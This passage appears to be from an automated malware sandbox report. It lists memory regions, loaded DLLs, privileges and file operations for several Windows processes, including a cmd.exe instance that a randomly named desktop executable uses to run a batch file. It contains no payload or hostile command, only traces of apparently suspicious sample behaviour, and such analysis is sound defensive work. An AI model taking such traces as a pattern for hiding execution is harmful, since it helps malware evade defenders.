| pagefile_0x00007ff63d810000 | 0x7ff63d810000 | 0x7ff63d90ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff63d910000 | 0x7ff63d910000 | 0x7ff63d932fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff63d933000 | 0x7ff63d933000 | 0x7ff63d934fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff63d935000 | 0x7ff63d935000 | 0x7ff63d936fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff63d937000 | 0x7ff63d937000 | 0x7ff63d938fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff63d939000 | 0x7ff63d939000 | 0x7ff63d93afff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff63d93b000 | 0x7ff63d93b000 | 0x7ff63d93bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff63d93c000 | 0x7ff63d93c000 | 0x7ff63d93dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff63d93e000 | 0x7ff63d93e000 | 0x7ff63d93ffff | Private Memory | rw |
|
|
|
- |
| dllhost.exe | 0x7ff63dbd0000 | 0x7ff63dbd6fff | Memory Mapped File | rwx |
|
|
|
- |
| thumbcache.dll | 0x7ffae6ef0000 | 0x7ffae6f3afff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7ffaecc30000 | 0x7ffaecea3fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7ffaf1040000 | 0x7ffaf11c2fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7ffaf2d10000 | 0x7ffaf2da5fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ffaf3960000 | 0x7ffaf3992fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ffaf3d00000 | 0x7ffaf3d16fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ffaf41e0000 | 0x7ffaf41eafff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffaf4260000 | 0x7ffaf4287fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffaf4290000 | 0x7ffaf42fafff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffaf44d0000 | 0x7ffaf44defff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ffaf4bc0000 | 0x7ffaf4c72fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffaf4e50000 | 0x7ffaf502cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffaf5140000 | 0x7ffaf528dfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffaf5290000 | 0x7ffaf53b5fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7ffaf53c0000 | 0x7ffaf53f5fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffaf5700000 | 0x7ffaf579cfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffaf57a0000 | 0x7ffaf57fafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffaf5800000 | 0x7ffaf5984fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ffaf6ec0000 | 0x7ffaf6f64fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7ffaf6f70000 | 0x7ffaf70cbfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffaf70d0000 | 0x7ffaf717cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ffaf7190000 | 0x7ffaf724dfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffaf72e0000 | 0x7ffaf755bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
Process #79: wmiadap.exe
0
0
| Information | Value |
|---|---|
| ID | #79 |
| File Name | c:\windows\system32\wbem\wmiadap.exe |
| Command Line | wmiadap.exe /F /T /R |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x48c |
| Parent PID | 0x318 (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
E14
0x
E18
0x
7DC
0x
53C
0x
5DC
0x
6FC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00000076bff60000 | 0x76bff60000 | 0x76bff6ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000076bff70000 | 0x76bff70000 | 0x76bff76fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000076bff80000 | 0x76bff80000 | 0x76bff93fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000076bffa0000 | 0x76bffa0000 | 0x76c001ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000076c0020000 | 0x76c0020000 | 0x76c0023fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000076c0030000 | 0x76c0030000 | 0x76c0030fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000076c0040000 | 0x76c0040000 | 0x76c0041fff | Private Memory | rw |
|
|
|
- |
| private_0x00000076c0050000 | 0x76c0050000 | 0x76c00cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000076c00d0000 | 0x76c00d0000 | 0x76c00d6fff | Private Memory | rw |
|
|
|
- |
| private_0x00000076c00e0000 | 0x76c00e0000 | 0x76c01dffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x76c01e0000 | 0x76c029dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000076c02a0000 | 0x76c02a0000 | 0x76c031ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000076c0320000 | 0x76c0320000 | 0x76c0320fff | Private Memory | rw |
|
|
|
- |
| private_0x00000076c0330000 | 0x76c0330000 | 0x76c0330fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000076c0340000 | 0x76c0340000 | 0x76c0340fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000076c0350000 | 0x76c0350000 | 0x76c0350fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000076c0380000 | 0x76c0380000 | 0x76c038ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000076c0390000 | 0x76c0390000 | 0x76c0517fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000076c0520000 | 0x76c0520000 | 0x76c06a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000076c06b0000 | 0x76c06b0000 | 0x76c076ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x76c0770000 | 0x76c0aa6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000076c0ab0000 | 0x76c0ab0000 | 0x76c0b2ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000076c0b30000 | 0x76c0b30000 | 0x76c0baffff | Private Memory | rw |
|
|
|
- |
| private_0x00000076c0bb0000 | 0x76c0bb0000 | 0x76c0c2ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ff890000 | 0x7df5ff890000 | 0x7ff5ff88ffff | Pagefile Backed Memory | - |
|
|
|
- |
| pagefile_0x00007ff6ee360000 | 0x7ff6ee360000 | 0x7ff6ee45ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff6ee460000 | 0x7ff6ee460000 | 0x7ff6ee482fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff6ee483000 | 0x7ff6ee483000 | 0x7ff6ee484fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6ee485000 | 0x7ff6ee485000 | 0x7ff6ee486fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6ee487000 | 0x7ff6ee487000 | 0x7ff6ee488fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6ee489000 | 0x7ff6ee489000 | 0x7ff6ee48afff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6ee48b000 | 0x7ff6ee48b000 | 0x7ff6ee48cfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6ee48d000 | 0x7ff6ee48d000 | 0x7ff6ee48efff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6ee48f000 | 0x7ff6ee48f000 | 0x7ff6ee48ffff | Private Memory | rw |
|
|
|
- |
| wmiadap.exe | 0x7ff6ee7b0000 | 0x7ff6ee7defff | Memory Mapped File | rwx |
|
|
|
- |
| wbemsvc.dll | 0x7ffae9470000 | 0x7ffae9483fff | Memory Mapped File | rwx |
|
|
|
- |
| fastprox.dll | 0x7ffae9490000 | 0x7ffae9587fff | Memory Mapped File | rwx |
|
|
|
- |
| wbemprox.dll | 0x7ffae9fa0000 | 0x7ffae9fb0fff | Memory Mapped File | rwx |
|
|
|
- |
| wbemcomn.dll | 0x7ffaef560000 | 0x7ffaef5defff | Memory Mapped File | rwx |
|
|
|
- |
| loadperf.dll | 0x7ffaf0240000 | 0x7ffaf0264fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ffaf3960000 | 0x7ffaf3992fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ffaf3d00000 | 0x7ffaf3d16fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ffaf41e0000 | 0x7ffaf41eafff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffaf4260000 | 0x7ffaf4287fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffaf4290000 | 0x7ffaf42fafff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffaf44d0000 | 0x7ffaf44defff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffaf4e50000 | 0x7ffaf502cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffaf5140000 | 0x7ffaf528dfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffaf5290000 | 0x7ffaf53b5fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffaf5700000 | 0x7ffaf579cfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffaf57a0000 | 0x7ffaf57fafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffaf5800000 | 0x7ffaf5984fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ffaf6ec0000 | 0x7ffaf6f64fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffaf70d0000 | 0x7ffaf717cfff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x7ffaf7180000 | 0x7ffaf7187fff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ffaf7190000 | 0x7ffaf724dfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffaf72e0000 | 0x7ffaf755bfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x7ffaf7560000 | 0x7ffaf75c8fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x7ffaf7680000 | 0x7ffaf7687fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
Process #80: taskhostw.exe
0
0
| Information | Value |
|---|---|
| ID | #80 |
| File Name | c:\windows\system32\taskhostw.exe |
| Command Line | taskhostw.exe |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x704 |
| Parent PID | 0x318 (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
954
0x
B74
0x
59C
0x
5D4
0x
63C
0x
648
0x
D18
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000100c270000 | 0x100c270000 | 0x100c27ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000100c280000 | 0x100c280000 | 0x100c286fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000100c290000 | 0x100c290000 | 0x100c2a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000100c2b0000 | 0x100c2b0000 | 0x100c32ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000100c330000 | 0x100c330000 | 0x100c333fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000100c340000 | 0x100c340000 | 0x100c340fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000100c350000 | 0x100c350000 | 0x100c351fff | Private Memory | rw |
|
|
|
- |
| private_0x000000100c360000 | 0x100c360000 | 0x100c3dffff | Private Memory | rw |
|
|
|
- |
| private_0x000000100c3e0000 | 0x100c3e0000 | 0x100c3e6fff | Private Memory | rw |
|
|
|
- |
| taskhostw.exe.mui | 0x100c3f0000 | 0x100c3f0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000100c400000 | 0x100c400000 | 0x100c400fff | Private Memory | rw |
|
|
|
- |
| private_0x000000100c410000 | 0x100c410000 | 0x100c50ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x100c510000 | 0x100c5cdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000100c5d0000 | 0x100c5d0000 | 0x100c5d0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000100c5e0000 | 0x100c5e0000 | 0x100c5e3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000100c5f0000 | 0x100c5f0000 | 0x100c5f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000100c600000 | 0x100c600000 | 0x100c600fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000100c610000 | 0x100c610000 | 0x100c611fff | Pagefile Backed Memory | r |
|
|
|
- |
| radarrs.dll.mui | 0x100c620000 | 0x100c622fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000100c630000 | 0x100c630000 | 0x100c63ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000100c640000 | 0x100c640000 | 0x100c6bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000100c6c0000 | 0x100c6c0000 | 0x100c847fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000100c850000 | 0x100c850000 | 0x100c9d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000100c9e0000 | 0x100c9e0000 | 0x100dddffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000100dde0000 | 0x100dde0000 | 0x100de97fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000100dea0000 | 0x100dea0000 | 0x100df1ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000100df20000 | 0x100df20000 | 0x100df9ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000100dfa0000 | 0x100dfa0000 | 0x100dfa1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000100dfb0000 | 0x100dfb0000 | 0x100dfbffff | Private Memory | rw |
|
|
|
- |
| private_0x000000100e020000 | 0x100e020000 | 0x100e02ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000100e030000 | 0x100e030000 | 0x100e0affff | Private Memory | rw |
|
|
|
- |
| private_0x000000100e100000 | 0x100e100000 | 0x100e20ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000100e330000 | 0x100e330000 | 0x100e3bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ff470000 | 0x7df5ff470000 | 0x7ff5ff46ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff682bce000 | 0x7ff682bce000 | 0x7ff682bcffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff682bd0000 | 0x7ff682bd0000 | 0x7ff682ccffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff682cd0000 | 0x7ff682cd0000 | 0x7ff682cf2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff682cf4000 | 0x7ff682cf4000 | 0x7ff682cf5fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff682cf6000 | 0x7ff682cf6000 | 0x7ff682cf7fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff682cf8000 | 0x7ff682cf8000 | 0x7ff682cf8fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff682cfa000 | 0x7ff682cfa000 | 0x7ff682cfbfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff682cfc000 | 0x7ff682cfc000 | 0x7ff682cfdfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff682cfe000 | 0x7ff682cfe000 | 0x7ff682cfffff | Private Memory | rw |
|
|
|
- |
| taskhostw.exe | 0x7ff683440000 | 0x7ff683458fff | Memory Mapped File | rwx |
|
|
|
- |
| wer.dll | 0x7ffae0030000 | 0x7ffae00cdfff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x7ffaeb6f0000 | 0x7ffaeb6f9fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7ffaecc30000 | 0x7ffaecea3fff | Memory Mapped File | rwx |
|
|
|
- |
| wdi.dll | 0x7ffaecef0000 | 0x7ffaecf0cfff | Memory Mapped File | rwx |
|
|
|
- |
| rstrtmgr.dll | 0x7ffaef3a0000 | 0x7ffaef3d1fff | Memory Mapped File | rwx |
|
|
|
- |
| radarrs.dll | 0x7ffaf0460000 | 0x7ffaf0476fff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x7ffaf24b0000 | 0x7ffaf24d1fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7ffaf2d10000 | 0x7ffaf2da5fff | Memory Mapped File | rwx |
|
|
|
- |
| ntasn1.dll | 0x7ffaf3ed0000 | 0x7ffaf3f05fff | Memory Mapped File | rwx |
|
|
|
- |
| ncrypt.dll | 0x7ffaf4180000 | 0x7ffaf41a5fff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffaf4260000 | 0x7ffaf4287fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffaf4290000 | 0x7ffaf42fafff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ffaf4440000 | 0x7ffaf4489fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ffaf4490000 | 0x7ffaf44a2fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffaf44d0000 | 0x7ffaf44defff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x7ffaf4590000 | 0x7ffaf4bb7fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ffaf4bc0000 | 0x7ffaf4c72fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffaf4e50000 | 0x7ffaf502cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffaf5140000 | 0x7ffaf528dfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffaf5290000 | 0x7ffaf53b5fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7ffaf53c0000 | 0x7ffaf53f5fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7ffaf55b0000 | 0x7ffaf56f0fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffaf5700000 | 0x7ffaf579cfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffaf57a0000 | 0x7ffaf57fafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffaf5800000 | 0x7ffaf5984fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7ffaf5990000 | 0x7ffaf6eb4fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ffaf6ec0000 | 0x7ffaf6f64fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7ffaf6f70000 | 0x7ffaf70cbfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffaf70d0000 | 0x7ffaf717cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ffaf7190000 | 0x7ffaf724dfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffaf72e0000 | 0x7ffaf755bfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ffaf75d0000 | 0x7ffaf7675fff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7ffaf7860000 | 0x7ffaf78b0fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
Process #81: cmd.exe
353
0
| Information | Value |
|---|---|
| ID | #81 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:50, Reason: Child Process |
| Unmonitor | End Time: 00:04:58, Reason: Self Terminated |
| Monitor Duration | 00:01:08 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xec4 |
| Parent PID | 0xbd0 (c:\users\ciihmnxmn6ps\desktop\current_dirnwovkcyl.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
EBC
0x
F08
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000b50000 | 0x00b50000 | 0x00b6ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000b50000 | 0x00b50000 | 0x00b5ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000b60000 | 0x00b60000 | 0x00b63fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b70000 | 0x00b70000 | 0x00b71fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b70000 | 0x00b70000 | 0x00b73fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000b80000 | 0x00b80000 | 0x00b93fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000ba0000 | 0x00ba0000 | 0x00bdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000be0000 | 0x00be0000 | 0x00cdffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000ce0000 | 0x00ce0000 | 0x00ce3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000cf0000 | 0x00cf0000 | 0x00cf0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000d00000 | 0x00d00000 | 0x00d01fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00d10000 | 0x00dcdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000dd0000 | 0x00dd0000 | 0x00e0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e10000 | 0x00e10000 | 0x00e1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e30000 | 0x00e30000 | 0x00e3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e40000 | 0x00e40000 | 0x00fbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000fc0000 | 0x00fc0000 | 0x010bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000010c0000 | 0x010c0000 | 0x0121ffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x013d0000 | 0x0141ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001420000 | 0x01420000 | 0x0541ffff | Pagefile Backed Memory | - |
|
|
|
- |
| sortdefault.nls | 0x05420000 | 0x05756fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x74540000 | 0x74547fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ee80000 | 0x7ee80000 | 0x7ef7ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ef80000 | 0x7ef80000 | 0x7efa2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efa8000 | 0x7efa8000 | 0x7efaafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efab000 | 0x7efab000 | 0x7efabfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efac000 | 0x7efac000 | 0x7efacfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (271)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
